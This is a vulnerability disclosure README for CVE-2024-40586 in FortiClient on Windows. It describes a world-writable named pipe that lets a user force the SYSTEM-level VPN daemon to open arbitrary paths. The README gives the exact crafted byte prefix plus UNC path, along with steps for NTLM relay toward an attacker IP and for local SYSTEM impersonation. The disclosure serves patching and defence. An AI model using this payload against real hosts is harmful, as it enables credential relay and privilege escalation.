CVE-2024-40586 PoC — Fortinet FortiClient 访问控制错误漏洞

Source

Associated Vulnerability

Readme

# CVE-2024-40586 Windows Coerced Authentication in FortiClient

On Windows system, it was found that FortiClient (App version 7.0.8.0427) allow a remote unprivileged user to coerce Windows hosts authenticate to other machines via a named pipe responsible for FortiSSLVPNdaemon service.

It was observed that the named pipe "FortiSslvpnNamedPipe" allow READ and WRITE from any user.

![Fig1](img/Fig1.png)

# Analysis

The app read the 5th byte of buffer from the named pipe as op code `PipeBuffer+4`


![Fig2](img/Fig2.png)

It was observed that the app will read file if the op code is equal to 24 (i.e., 0x18)
Code flow: `Case 24` => `LABEL_26` => `strncpy` copy payload to variable `Buffer` => pass the payload to `sub_7FF60C3EAC20` => call `CreateFileA` => `ReadFile`
![Fig3](img/Fig3.png)

![Fig4](img/Fig4.png)

![Fig5](img/Fig5.png)

However, the application does not do anything about the file content.

# Exploit

We can send a crafted traffic (i.e., "\x00\x00\x00\x00\x18\x00" concatenate with target path) to vulnerable named pipe "FortiSslvpnNamedPipe" to trigger op code 24 and force the process "FortiSSLVPNdaemon.exe" call `CreateFileA` with SYSTEM privilege. Therefore, we can force the server to connect remote file by submitting UNC path (e.g., "\\\\\<remote ip>\\\<file path>") or connect local named pipe (e.g., "\\\\[127.0.0.1](http://127.0.0.1/)\\pipe\\\<named pipe>")

### Scenario 1

To coerce Windows hosts authenticate to other machines with a remote unauthenticated user, the user could follow the step:

1. On attacker machine, start a listener to receive coerced authentication
2. On attacker machine, send crafted payload (i.e., "\x00\x00\x00\x00\x18\x00" + "\\\\\<attacker IP>\\fake\\fake") to vulnerable named pipe of victim machine "\\\\\<victim IP>\\pipe\\FortiSslvpnNamedPipe" to force the process connect a remote file with UNC path "\\\\\<attacker IP>\\fake\\fake"
3. Similar to other coerce authentication attack (e.g., SpoolSample), attacker could perform relay attack or authentication downgrade attack

![Fig6](img/Fig6.png)


### Scenario 2
To perform privilege escalation to SYSTEM from a local user with "SeImpersonatePrivilege" (e.g., "nt authority\network service"), the user could follow the steps:
1. Create a named pipe server that wait for connection.
2. Send crafted payload (i.e., "\x00\x00\x00\x00\x18\x00" + "\\\\127.0.0.1\\pipe\\\<pipe server>\\XXX") to local vulnerable named pipe "\\\\\.\\pipe\\FortiSslvpnNamedPipe" to force the process connect to our named pipe server
3. After the connection come in, call `ImpersonateNamedPipeClient()` to impersonate SYSTEM privilege.

![Fig7](img/Fig7.png)



# Timeline
- 07/09/2023 - Vulnerability reported to Fortinet
- 08/30/2023 - Fortinet confirmed vulnerability 
- 02/11/2024 - Publication



# Reference
- https://fortiguard.fortinet.com/psirt/FG-IR-23-279

File Snapshot

 [4.0K]  /data/pocs/b464e88b5f0d07e5f2147dcd7acba52182c6b3bf
├── [4.0K]  img
│   ├── [ 98K]  Fig1.png
│   ├── [ 28K]  Fig2.png
│   ├── [ 52K]  Fig3.png
│   ├── [105K]  Fig4.png
│   ├── [150K]  Fig5.png
│   ├── [376K]  Fig6.png
│   └── [427K]  Fig7.png
├── [4.0K]  poc-forticlient
│   ├── [4.0K]  poc-forticlient
│   │   ├── [1.1K]  poc-forticlient.cpp
│   │   ├── [6.4K]  poc-forticlient.vcxproj
│   │   ├── [ 967]  poc-forticlient.vcxproj.filters
│   │   └── [ 165]  poc-forticlient.vcxproj.user
│   └── [1.4K]  poc-forticlient.sln
└── [2.8K]  README.md

3 directories, 13 files

Remarks